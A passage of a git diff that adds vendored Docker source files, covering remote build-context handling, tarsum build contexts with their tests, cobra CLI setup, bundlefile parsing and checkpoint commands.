(io.ReadCloser, error) { + dockerfile, err := ioutil.ReadAll(rc) + if err != nil { + return nil, err + } + + // dockerfileName is set to signal that the remote was interpreted as a single Dockerfile, in which case the caller + // should use dockerfileName as the new name for the Dockerfile, irrespective of any other user input. + dockerfileName = DefaultDockerfileName + + // TODO: return a context without tarsum + r, err := archive.Generate(dockerfileName, string(dockerfile)) + if err != nil { + return nil, err + } + + return ioutil.NopCloser(r), nil + }, + // fallback handler (tar context) + "": func(rc io.ReadCloser) (io.ReadCloser, error) { + return createProgressReader(rc), nil + }, + }) + default: + err = fmt.Errorf("remoteURL (%s) could not be recognized as URL", remoteURL) + } + return +} + +// inspectResponse looks into the http response data at r to determine whether its +// content-type is on the list of acceptable content types for remote build contexts. +// This function returns: +// - a string representation of the detected content-type +// - an io.Reader for the response body +// - an error value which will be non-nil either when something goes wrong while +// reading bytes from r or when the detected content-type is not acceptable. +func inspectResponse(ct string, r io.ReadCloser, clen int64) (string, io.ReadCloser, error) { + plen := clen + if plen <= 0 || plen > maxPreambleLength { + plen = maxPreambleLength + } + + preamble := make([]byte, plen, plen) + rlen, err := r.Read(preamble) + if rlen == 0 { + return ct, r, errors.New("empty response") + } + if err != nil && err != io.EOF { + return ct, r, err + } + + preambleR := bytes.NewReader(preamble) + bodyReader := ioutil.NopCloser(io.MultiReader(preambleR, r)) + // Some web servers will use application/octet-stream as the default + // content type for files without an extension (e.g. 'Dockerfile') + // so if we receive this value we better check for text content + contentType := ct + if len(ct) == 0 || ct == httputils.MimeTypes.OctetStream { + contentType, _, err = httputils.DetectContentType(preamble) + if err != nil { + return contentType, bodyReader, err + } + } + + contentType = selectAcceptableMIME(contentType) + var cterr error + if len(contentType) == 0 { + cterr = fmt.Errorf("unsupported Content-Type %q", ct) + contentType = ct + } + + return contentType, bodyReader, cterr +} + +func selectAcceptableMIME(ct string) string { + return mimeRe.FindString(ct) +} diff --git a/vendor/github.com/docker/docker/builder/remote_test.go b/vendor/github.com/docker/docker/builder/remote_test.go new file mode 100644 index 0000000000..691a084761 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remote_test.go @@ -0,0 +1,213 @@ +package builder + +import ( + "bytes" + "io" + "io/ioutil" + "net/http" + "net/http/httptest" + "net/url" + "testing" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/httputils" +) + +var binaryContext = []byte{0xFD, 0x37, 0x7A, 0x58, 0x5A, 0x00} //xz magic + +func TestSelectAcceptableMIME(t *testing.T) { + validMimeStrings := []string{ + "application/x-bzip2", + "application/bzip2", + "application/gzip", + "application/x-gzip", + "application/x-xz", + "application/xz", + "application/tar", + "application/x-tar", + "application/octet-stream", + "text/plain", + } + + invalidMimeStrings := []string{ + "", + "application/octet", + "application/json", + } + + for _, m := range invalidMimeStrings { + if len(selectAcceptableMIME(m)) > 0 { + t.Fatalf("Should not have accepted %q", m) + } + } + + for _, m := range validMimeStrings { + if str := selectAcceptableMIME(m); str == "" { + t.Fatalf("Should have accepted %q", m) + } + } +} + +func TestInspectEmptyResponse(t *testing.T) { + ct := "application/octet-stream" + br := ioutil.NopCloser(bytes.NewReader([]byte(""))) + contentType, bReader, err := inspectResponse(ct, br, 0) + if err == nil { + t.Fatalf("Should have generated an error for an empty response") + } + if contentType != "application/octet-stream" { + t.Fatalf("Content type should be 'application/octet-stream' but is %q", contentType) + } + body, err := ioutil.ReadAll(bReader) + if err != nil { + t.Fatal(err) + } + if len(body) != 0 { + t.Fatal("response body should remain empty") + } +} + +func TestInspectResponseBinary(t *testing.T) { + ct := "application/octet-stream" + br := ioutil.NopCloser(bytes.NewReader(binaryContext)) + contentType, bReader, err := inspectResponse(ct, br, int64(len(binaryContext))) + if err != nil { + t.Fatal(err) + } + if contentType != "application/octet-stream" { + t.Fatalf("Content type should be 'application/octet-stream' but is %q", contentType) + } + body, err := ioutil.ReadAll(bReader) + if err != nil { + t.Fatal(err) + } + if len(body) != len(binaryContext) { + t.Fatalf("Wrong response size %d, should be == len(binaryContext)", len(body)) + } + for i := range body { + if body[i] != binaryContext[i] { + t.Fatalf("Corrupted response body at byte index %d", i) + } + } +} + +func TestResponseUnsupportedContentType(t *testing.T) { + content := []byte(dockerfileContents) + ct := "application/json" + br := ioutil.NopCloser(bytes.NewReader(content)) + contentType, bReader, err := inspectResponse(ct, br, int64(len(dockerfileContents))) + + if err == nil { + t.Fatal("Should have returned an error on content-type 'application/json'") + } + if contentType != ct { + t.Fatalf("Should not have altered content-type: orig: %s, altered: %s", ct, contentType) + } + body, err := ioutil.ReadAll(bReader) + if err != nil { + t.Fatal(err) + } + if string(body) != dockerfileContents { + t.Fatalf("Corrupted response body %s", body) + } +} + +func TestInspectResponseTextSimple(t *testing.T) { + content := []byte(dockerfileContents) + ct := "text/plain" + br := ioutil.NopCloser(bytes.NewReader(content)) + contentType, bReader, err := inspectResponse(ct, br, int64(len(content))) + if err != nil { + t.Fatal(err) + } + if contentType != "text/plain" { + t.Fatalf("Content type should be 'text/plain' but is %q", contentType) + } + body, err := ioutil.ReadAll(bReader) + if err != nil { + t.Fatal(err) + } + if string(body) != dockerfileContents { + t.Fatalf("Corrupted response body %s", body) + } +} + +func TestInspectResponseEmptyContentType(t *testing.T) { + content := []byte(dockerfileContents) + br := ioutil.NopCloser(bytes.NewReader(content)) + contentType, bodyReader, err := inspectResponse("", br, int64(len(content))) + if err != nil { + t.Fatal(err) + } + if contentType != "text/plain" { + t.Fatalf("Content type should be 'text/plain' but is %q", contentType) + } + body, err := ioutil.ReadAll(bodyReader) + if err != nil { + t.Fatal(err) + } + if string(body) != dockerfileContents { + t.Fatalf("Corrupted response body %s", body) + } +} + +func TestMakeRemoteContext(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + + mux := http.NewServeMux() + server := httptest.NewServer(mux) + serverURL, _ := url.Parse(server.URL) + + serverURL.Path = "/" + DefaultDockerfileName + remoteURL := serverURL.String() + + mux.Handle("/", http.FileServer(http.Dir(contextDir))) + + remoteContext, err := MakeRemoteContext(remoteURL, map[string]func(io.ReadCloser) (io.ReadCloser, error){ + httputils.MimeTypes.TextPlain: func(rc io.ReadCloser) (io.ReadCloser, error) { + dockerfile, err := ioutil.ReadAll(rc) + if err != nil { + return nil, err + } + + r, err := archive.Generate(DefaultDockerfileName, string(dockerfile)) + if err != nil { + return nil, err + } + return ioutil.NopCloser(r), nil + }, + }) + + if err != nil { + t.Fatalf("Error when executing DetectContextFromRemoteURL: %s", err) + } + + if remoteContext == nil { + t.Fatalf("Remote context should not be nil") + } + + tarSumCtx, ok := remoteContext.(*tarSumContext) + + if !ok { + t.Fatalf("Cast error, remote context should be casted to tarSumContext") + } + + fileInfoSums := tarSumCtx.sums + + if fileInfoSums.Len() != 1 { + t.Fatalf("Size of file info sums should be 1, got: %d", fileInfoSums.Len()) + } + + fileInfo := fileInfoSums.GetFile(DefaultDockerfileName) + + if fileInfo == nil { + t.Fatalf("There should be file named %s in fileInfoSums", DefaultDockerfileName) + } + + if fileInfo.Pos() != 0 { + t.Fatalf("File %s should have position 0, got %d", DefaultDockerfileName, fileInfo.Pos()) + } +} diff --git a/vendor/github.com/docker/docker/builder/tarsum.go b/vendor/github.com/docker/docker/builder/tarsum.go new file mode 100644 index 0000000000..35054dcba1 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/tarsum.go @@ -0,0 +1,158 @@ +package builder + +import ( + "fmt" + "io" + "os" + "path/filepath" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/symlink" + "github.com/docker/docker/pkg/tarsum" +) + +type tarSumContext struct { + root string + sums tarsum.FileInfoSums +} + +func (c *tarSumContext) Close() error { + return os.RemoveAll(c.root) +} + +func convertPathError(err error, cleanpath string) error { + if err, ok := err.(*os.PathError); ok { + err.Path = cleanpath + return err + } + return err +} + +func (c *tarSumContext) Open(path string) (io.ReadCloser, error) { + cleanpath, fullpath, err := c.normalize(path) + if err != nil { + return nil, err + } + r, err := os.Open(fullpath) + if err != nil { + return nil, convertPathError(err, cleanpath) + } + return r, nil +} + +func (c *tarSumContext) Stat(path string) (string, FileInfo, error) { + cleanpath, fullpath, err := c.normalize(path) + if err != nil { + return "", nil, err + } + + st, err := os.Lstat(fullpath) + if err != nil { + return "", nil, convertPathError(err, cleanpath) + } + + rel, err := filepath.Rel(c.root, fullpath) + if err != nil { + return "", nil, convertPathError(err, cleanpath) + } + + // We set sum to path by default for the case where GetFile returns nil. + // The usual case is if relative path is empty. + sum := path + // Use the checksum of the followed path(not the possible symlink) because + // this is the file that is actually copied. + if tsInfo := c.sums.GetFile(filepath.ToSlash(rel)); tsInfo != nil { + sum = tsInfo.Sum() + } + fi := &HashedFileInfo{PathFileInfo{st, fullpath, filepath.Base(cleanpath)}, sum} + return rel, fi, nil +} + +// MakeTarSumContext returns a build Context from a tar stream. +// +// It extracts the tar stream to a temporary folder that is deleted as soon as +// the Context is closed. +// As the extraction happens, a tarsum is calculated for every file, and the set of +// all those sums then becomes the source of truth for all operations on this Context. +// +// Closing tarStream has to be done by the caller. +func MakeTarSumContext(tarStream io.Reader) (ModifiableContext, error) { + root, err := ioutils.TempDir("", "docker-builder") + if err != nil { + return nil, err + } + + tsc := &tarSumContext{root: root} + + // Make sure we clean-up upon error. In the happy case the caller + // is expected to manage the clean-up + defer func() { + if err != nil { + tsc.Close() + } + }() + + decompressedStream, err := archive.DecompressStream(tarStream) + if err != nil { + return nil, err + } + + sum, err := tarsum.NewTarSum(decompressedStream, true, tarsum.Version1) + if err != nil { + return nil, err + } + + if err := chrootarchive.Untar(sum, root, nil); err != nil { + return nil, err + } + + tsc.sums = sum.GetSums() + + return tsc, nil +} + +func (c *tarSumContext) normalize(path string) (cleanpath, fullpath string, err error) { + cleanpath = filepath.Clean(string(os.PathSeparator) + path)[1:] + fullpath, err = symlink.FollowSymlinkInScope(filepath.Join(c.root, path), c.root) + if err != nil { + return "", "", fmt.Errorf("Forbidden path outside the build context: %s (%s)", path, fullpath) + } + _, err = os.Lstat(fullpath) + if err != nil { + return "", "", convertPathError(err, path) + } + return +} + +func (c *tarSumContext) Walk(root string, walkFn WalkFunc) error { + root = filepath.Join(c.root, filepath.Join(string(filepath.Separator), root)) + return filepath.Walk(root, func(fullpath string, info os.FileInfo, err error) error { + rel, err := filepath.Rel(c.root, fullpath) + if err != nil { + return err + } + if rel == "." { + return nil + } + + sum := rel + if tsInfo := c.sums.GetFile(filepath.ToSlash(rel)); tsInfo != nil { + sum = tsInfo.Sum() + } + fi := &HashedFileInfo{PathFileInfo{FileInfo: info, FilePath: fullpath}, sum} + if err := walkFn(rel, fi, nil); err != nil { + return err + } + return nil + }) +} + +func (c *tarSumContext) Remove(path string) error { + _, fullpath, err := c.normalize(path) + if err != nil { + return err + } + return os.RemoveAll(fullpath) +} diff --git a/vendor/github.com/docker/docker/builder/tarsum_test.go b/vendor/github.com/docker/docker/builder/tarsum_test.go new file mode 100644 index 0000000000..278e5830de --- /dev/null +++ b/vendor/github.com/docker/docker/builder/tarsum_test.go @@ -0,0 +1,265 @@ +package builder + +import ( + "bufio" + "bytes" + "io/ioutil" + "os" + "path/filepath" + "testing" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/reexec" +) + +const ( + filename = "test" + contents = "contents test" +) + +func init() { + reexec.Init() +} + +func TestCloseRootDirectory(t *testing.T) { + contextDir, err := ioutil.TempDir("", "builder-tarsum-test") + + if err != nil { + t.Fatalf("Error with creating temporary directory: %s", err) + } + + tarsum := &tarSumContext{root: contextDir} + + err = tarsum.Close() + + if err != nil { + t.Fatalf("Error while executing Close: %s", err) + } + + _, err = os.Stat(contextDir) + + if !os.IsNotExist(err) { + t.Fatalf("Directory should not exist at this point") + defer os.RemoveAll(contextDir) + } +} + +func TestOpenFile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + createTestTempFile(t, contextDir, filename, contents, 0777) + + tarSum := &tarSumContext{root: contextDir} + + file, err := tarSum.Open(filename) + + if err != nil { + t.Fatalf("Error when executing Open: %s", err) + } + + defer file.Close() + + scanner := bufio.NewScanner(file) + buff := bytes.NewBufferString("") + + for scanner.Scan() { + buff.WriteString(scanner.Text()) + } + + if contents != buff.String() { + t.Fatalf("Contents are not equal. Expected: %s, got: %s", contents, buff.String()) + } + +} + +func TestOpenNotExisting(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + tarSum := &tarSumContext{root: contextDir} + + file, err := tarSum.Open("not-existing") + + if file != nil { + t.Fatal("Opened file should be nil") + } + + if !os.IsNotExist(err) { + t.Fatalf("Error when executing Open: %s", err) + } +} + +func TestStatFile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + testFilename := createTestTempFile(t, contextDir, filename, contents, 0777) + + tarSum := &tarSumContext{root: contextDir} + + relPath, fileInfo, err := tarSum.Stat(filename) + + if err != nil { + t.Fatalf("Error when executing Stat: %s", err) + } + + if relPath != filename { + t.Fatalf("Relative path should be equal to %s, got %s", filename, relPath) + } + + if fileInfo.Path() != testFilename { + t.Fatalf("Full path should be equal to %s, got %s", testFilename, fileInfo.Path()) + } +} + +func TestStatSubdir(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir") + + testFilename := createTestTempFile(t, contextSubdir, filename, contents, 0777) + + tarSum := &tarSumContext{root: contextDir} + + relativePath, err := filepath.Rel(contextDir, testFilename) + + if err != nil { + t.Fatalf("Error when getting relative path: %s", err) + } + + relPath, fileInfo, err := tarSum.Stat(relativePath) + + if err != nil { + t.Fatalf("Error when executing Stat: %s", err) + } + + if relPath != relativePath { + t.Fatalf("Relative path should be equal to %s, got %s", relativePath, relPath) + } + + if fileInfo.Path() != testFilename { + t.Fatalf("Full path should be equal to %s, got %s", testFilename, fileInfo.Path()) + } +} + +func TestStatNotExisting(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + tarSum := &tarSumContext{root: contextDir} + + relPath, fileInfo, err := tarSum.Stat("not-existing") + + if relPath != "" { + t.Fatal("Relative path should be nil") + } + + if fileInfo != nil { + t.Fatalf("File info should be nil") + } + + if !os.IsNotExist(err) { + t.Fatalf("This file should not exist: %s", err) + } +} + +func TestRemoveDirectory(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir") + + relativePath, err := filepath.Rel(contextDir, contextSubdir) + + if err != nil { + t.Fatalf("Error when getting relative path: %s", err) + } + + tarSum := &tarSumContext{root: contextDir} + + err = tarSum.Remove(relativePath) + + if err != nil { + t.Fatalf("Error when executing Remove: %s", err) + } + + _, err = os.Stat(contextSubdir) + + if !os.IsNotExist(err) { + t.Fatalf("Directory should not exist at this point") + } +} + +func TestMakeTarSumContext(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + createTestTempFile(t, contextDir, filename, contents, 0777) + + tarStream, err := archive.Tar(contextDir, archive.Uncompressed) + + if err != nil { + t.Fatalf("error: %s", err) + } + + defer tarStream.Close() + + tarSum, err := MakeTarSumContext(tarStream) + + if err != nil { + t.Fatalf("Error when executing MakeTarSumContext: %s", err) + } + + if tarSum == nil { + t.Fatalf("Tar sum context should not be nil") + } +} + +func TestWalkWithoutError(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir") + + createTestTempFile(t, contextSubdir, filename, contents, 0777) + + tarSum := &tarSumContext{root: contextDir} + + walkFun := func(path string, fi FileInfo, err error) error { + return nil + } + + err := tarSum.Walk(contextSubdir, walkFun) + + if err != nil { + t.Fatalf("Error when executing Walk: %s", err) + } +} + +type WalkError struct { +} + +func (we WalkError) Error() string { + return "Error when executing Walk" +} + +func TestWalkWithError(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir") + + tarSum := &tarSumContext{root: contextDir} + + walkFun := func(path string, fi FileInfo, err error) error { + return WalkError{} + } + + err := tarSum.Walk(contextSubdir, walkFun) + + if err == nil { + t.Fatalf("Error should not be nil") + } +} diff --git a/vendor/github.com/docker/docker/builder/utils_test.go b/vendor/github.com/docker/docker/builder/utils_test.go new file mode 100644 index 0000000000..1101ff1d1d --- /dev/null +++ b/vendor/github.com/docker/docker/builder/utils_test.go @@ -0,0 +1,87 @@ +package builder + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +const ( + dockerfileContents = "FROM busybox" + dockerignoreFilename = ".dockerignore" + testfileContents = "test" +) + +// createTestTempDir creates a temporary directory for testing. +// It returns the created path and a cleanup function which is meant to be used as deferred call. +// When an error occurs, it terminates the test. +func createTestTempDir(t *testing.T, dir, prefix string) (string, func()) { + path, err := ioutil.TempDir(dir, prefix) + + if err != nil { + t.Fatalf("Error when creating directory %s with prefix %s: %s", dir, prefix, err) + } + + return path, func() { + err = os.RemoveAll(path) + + if err != nil { + t.Fatalf("Error when removing directory %s: %s", path, err) + } + } +} + +// createTestTempSubdir creates a temporary directory for testing. +// It returns the created path but doesn't provide a cleanup function, +// so createTestTempSubdir should be used only for creating temporary subdirectories +// whose parent directories are properly cleaned up. +// When an error occurs, it terminates the test. +func createTestTempSubdir(t *testing.T, dir, prefix string) string { + path, err := ioutil.TempDir(dir, prefix) + + if err != nil { + t.Fatalf("Error when creating directory %s with prefix %s: %s", dir, prefix, err) + } + + return path +} + +// createTestTempFile creates a temporary file within dir with specific contents and permissions. +// When an error occurs, it terminates the test +func createTestTempFile(t *testing.T, dir, filename, contents string, perm os.FileMode) string { + filePath := filepath.Join(dir, filename) + err := ioutil.WriteFile(filePath, []byte(contents), perm) + + if err != nil { + t.Fatalf("Error when creating %s file: %s", filename, err) + } + + return filePath +} + +// chdir changes current working directory to dir. +// It returns a function which changes working directory back to the previous one. +// This function is meant to be executed as a deferred call. +// When an error occurs, it terminates the test. +func chdir(t *testing.T, dir string) func() { + workingDirectory, err := os.Getwd() + + if err != nil { + t.Fatalf("Error when retrieving working directory: %s", err) + } + + err = os.Chdir(dir) + + if err != nil { + t.Fatalf("Error when changing directory to %s: %s", dir, err) + } + + return func() { + err = os.Chdir(workingDirectory) + + if err != nil { + t.Fatalf("Error when changing back to working directory (%s): %s", workingDirectory, err) + } + } +} diff --git a/vendor/github.com/docker/docker/cli/cobra.go b/vendor/github.com/docker/docker/cli/cobra.go new file mode 100644 index 0000000000..139845cb1b --- /dev/null +++ b/vendor/github.com/docker/docker/cli/cobra.go @@ -0,0 +1,139 @@ +package cli + +import ( + "fmt" + "strings" + + "github.com/spf13/cobra" +) + +// SetupRootCommand sets default usage, help, and error handling for the +// root command. +func SetupRootCommand(rootCmd *cobra.Command) { + cobra.AddTemplateFunc("hasSubCommands", hasSubCommands) + cobra.AddTemplateFunc("hasManagementSubCommands", hasManagementSubCommands) + cobra.AddTemplateFunc("operationSubCommands", operationSubCommands) + cobra.AddTemplateFunc("managementSubCommands", managementSubCommands) + + rootCmd.SetUsageTemplate(usageTemplate) + rootCmd.SetHelpTemplate(helpTemplate) + rootCmd.SetFlagErrorFunc(FlagErrorFunc) + rootCmd.SetHelpCommand(helpCommand) + + rootCmd.PersistentFlags().BoolP("help", "h", false, "Print usage") + rootCmd.PersistentFlags().MarkShorthandDeprecated("help", "please use --help") +} + +// FlagErrorFunc prints an error message which matches the format of the +// docker/docker/cli error messages +func FlagErrorFunc(cmd *cobra.Command, err error) error { + if err == nil { + return err + } + + usage := "" + if cmd.HasSubCommands() { + usage = "\n\n" + cmd.UsageString() + } + return StatusError{ + Status: fmt.Sprintf("%s\nSee '%s --help'.%s", err, cmd.CommandPath(), usage), + StatusCode: 125, + } +} + +var helpCommand = &cobra.Command{ + Use: "help [command]", + Short: "Help about the command", + PersistentPreRun: func(cmd *cobra.Command, args []string) {}, + PersistentPostRun: func(cmd *cobra.Command, args []string) {}, + RunE: func(c *cobra.Command, args []string) error { + cmd, args, e := c.Root().Find(args) + if cmd == nil || e != nil || len(args) > 0 { + return fmt.Errorf("unknown help topic: %v", strings.Join(args, " ")) + } + + helpFunc := cmd.HelpFunc() + helpFunc(cmd, args) + return nil + }, +} + +func hasSubCommands(cmd *cobra.Command) bool { + return len(operationSubCommands(cmd)) > 0 +} + +func hasManagementSubCommands(cmd *cobra.Command) bool { + return len(managementSubCommands(cmd)) > 0 +} + +func operationSubCommands(cmd *cobra.Command) []*cobra.Command { + cmds := []*cobra.Command{} + for _, sub := range cmd.Commands() { + if sub.IsAvailableCommand() && !sub.HasSubCommands() { + cmds = append(cmds, sub) + } + } + return cmds +} + +func managementSubCommands(cmd *cobra.Command) []*cobra.Command { + cmds := []*cobra.Command{} + for _, sub := range cmd.Commands() { + if sub.IsAvailableCommand() && sub.HasSubCommands() { + cmds = append(cmds, sub) + } + } + return cmds +} + +var usageTemplate = `Usage: + +{{- if not .HasSubCommands}} {{.UseLine}}{{end}} +{{- if .HasSubCommands}} {{ .CommandPath}} COMMAND{{end}} + +{{ .Short | trim }} + +{{- if gt .Aliases 0}} + +Aliases: + {{.NameAndAliases}} + +{{- end}} +{{- if .HasExample}} + +Examples: +{{ .Example }} + +{{- end}} +{{- if .HasFlags}} + +Options: +{{.Flags.FlagUsages | trimRightSpace}} + +{{- end}} +{{- if hasManagementSubCommands . }} + +Management Commands: + +{{- range managementSubCommands . }} + {{rpad .Name .NamePadding }} {{.Short}} +{{- end}} + +{{- end}} +{{- if hasSubCommands .}} + +Commands: + +{{- range operationSubCommands . }} + {{rpad .Name .NamePadding }} {{.Short}} +{{- end}} +{{- end}} + +{{- if .HasSubCommands }} + +Run '{{.CommandPath}} COMMAND --help' for more information on a command. +{{- end}} +` + +var helpTemplate = ` +{{if or .Runnable .HasSubCommands}}{{.UsageString}}{{end}}` diff --git a/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go b/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go new file mode 100644 index 0000000000..7fd1e4f6c4 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go @@ -0,0 +1,69 @@ +package bundlefile + +import ( + "encoding/json" + "fmt" + "io" +) + +// Bundlefile stores the contents of a bundlefile +type Bundlefile struct { + Version string + Services map[string]Service +} + +// Service is a service from a bundlefile +type Service struct { + Image string + Command []string `json:",omitempty"` + Args []string `json:",omitempty"` + Env []string `json:",omitempty"` + Labels map[string]string `json:",omitempty"` + Ports []Port `json:",omitempty"` + WorkingDir *string `json:",omitempty"` + User *string `json:",omitempty"` + Networks []string `json:",omitempty"` +} + +// Port is a port as defined in a bundlefile +type Port struct { + Protocol string + Port uint32 +} + +// LoadFile loads a bundlefile from a path to the file +func LoadFile(reader io.Reader) (*Bundlefile, error) { + bundlefile := &Bundlefile{} + + decoder := json.NewDecoder(reader) + if err := decoder.Decode(bundlefile); err != nil { + switch jsonErr := err.(type) { + case *json.SyntaxError: + return nil, fmt.Errorf( + "JSON syntax error at byte %v: %s", + jsonErr.Offset, + jsonErr.Error()) + case *json.UnmarshalTypeError: + return nil, fmt.Errorf( + "Unexpected type at byte %v. Expected %s but received %s.", + jsonErr.Offset, + jsonErr.Type, + jsonErr.Value) + } + return nil, err + } + + return bundlefile, nil +} + +// Print writes the contents of the bundlefile to the output writer +// as human readable json +func Print(out io.Writer, bundle *Bundlefile) error { + bytes, err := json.MarshalIndent(*bundle, "", " ") + if err != nil { + return err + } + + _, err = out.Write(bytes) + return err +} diff --git a/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go b/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go new file mode 100644 index 0000000000..c343410df3 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go @@ -0,0 +1,77 @@ +package bundlefile + +import ( + "bytes" + "strings" + "testing" + + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestLoadFileV01Success(t *testing.T) { + reader := strings.NewReader(`{ + "Version": "0.1", + "Services": { + "redis": { + "Image": "redis@sha256:4b24131101fa0117bcaa18ac37055fffd9176aa1a240392bb8ea85e0be50f2ce", + "Networks": ["default"] + }, + "web": { + "Image": "dockercloud/hello-world@sha256:fe79a2cfbd17eefc344fb8419420808df95a1e22d93b7f621a7399fd1e9dca1d", + "Networks": ["default"], + "User": "web" + } + } + }`) + + bundle, err := LoadFile(reader) + assert.NilError(t, err) + assert.Equal(t, bundle.Version, "0.1") + assert.Equal(t, len(bundle.Services), 2) +} + +func TestLoadFileSyntaxError(t *testing.T) { + reader := strings.NewReader(`{ + "Version": "0.1", + "Services": unquoted string + }`) + + _, err := LoadFile(reader) + assert.Error(t, err, "syntax error at byte 37: invalid character 'u'") +} + +func TestLoadFileTypeError(t *testing.T) { + reader := strings.NewReader(`{ + "Version": "0.1", + "Services": { + "web": { + "Image": "redis", + "Networks": "none" + } + } + }`) + + _, err := LoadFile(reader) + assert.Error(t, err, "Unexpected type at byte 94. Expected []string but received string") +} + +func TestPrint(t *testing.T) { + var buffer bytes.Buffer + bundle := &Bundlefile{ + Version: "0.1", + Services: map[string]Service{ + "web": { + Image: "image", + Command: []string{"echo", "something"}, + }, + }, + } + assert.NilError(t, Print(&buffer, bundle)) + output := buffer.String() + assert.Contains(t, output, "\"Image\": \"image\"") + assert.Contains(t, output, + `"Command": [ + "echo", + "something" + ]`) +} diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go b/vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go new file mode 100644 index 0000000000..d5705a4dad --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go @@ -0,0 +1,24 @@ +package checkpoint + +import ( + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +// NewCheckpointCommand returns the `checkpoint` subcommand (only in experimental) +func NewCheckpointCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "checkpoint", + Short: "Manage checkpoints", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + Tags: map[string]string{"experimental": "", "version": "1.25"}, + } + cmd.AddCommand( + newCreateCommand(dockerCli), + newListCommand(dockerCli), + newRemoveCommand(dockerCli), + ) + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/create.go b/vendor/github.com/docker/docker/cli/command/checkpoint/create.go new file mode 100644 index 0000000000..473a941733 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/checkpoint/create.go @@ -0,0 +1,58 @@ +package checkpoint + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type createOptions struct { + container string + checkpoint string + checkpointDir string + leaveRunning bool +} + +func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts createOptions + + cmd := &cobra.Command{ + Use: "create [OPTIONS] CONTAINER CHECKPOINT", + Short: "Create a checkpoint from a running container", + Args: cli.ExactArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + opts.container = args[0] + opts.checkpoint = args[1] + return runCreate(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.BoolVar(&opts.leaveRunning, "leave-running", false, "Leave the container running after checkpoint") + flags.StringVarP(&opts.checkpointDir, "checkpoint-dir", "", "", "Use a custom checkpoint storage directory") + + return cmd +} + +func runCreate(dockerCli *command.DockerCli, opts createOptions) error { + client := dockerCli.Client() + + checkpointOpts := types.CheckpointCreateOptions{ + CheckpointID: opts.checkpoint, + CheckpointDir: opts.checkpointDir, + Exit: !opts.leaveRunning, + } + + err := client.CheckpointCreate(context.Background(), opts.container, checkpointOpts) + if err != nil { + return err + } + + fmt.Fprintf(dockerCli.Out(), "%s\n", opts.checkpoint) + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/list.go b/vendor/github.com/docker/docker/cli/command/checkpoint/list.go new file mode 100644 index 0000000000..daf8349993 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/checkpoint/list.go @@ -0,0 +1,62 @@ +package checkpoint + +import ( + "fmt" + "text/tabwriter" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type listOptions struct { + checkpointDir string +} + +func newListCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts listOptions + + cmd := &cobra.Command{ + Use: "ls [OPTIONS] CONTAINER", + Aliases: []string{"list"}, + Short: "List checkpoints for a container", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + return runList(dockerCli, args[0], opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.checkpointDir, "checkpoint-dir", "", "", "Use a custom checkpoint storage directory") + + return cmd + +} + +func runList(dockerCli *command.DockerCli, container string, opts listOptions) error { + client := dockerCli.Client() + + listOpts := types.CheckpointListOptions{ + CheckpointDir: opts.checkpointDir, + } + + checkpoints, err := client.CheckpointList(context.Background(), container, listOpts) + if err != nil { + return err + } + + w := tabwriter.NewWriter(dockerCli.Out(), 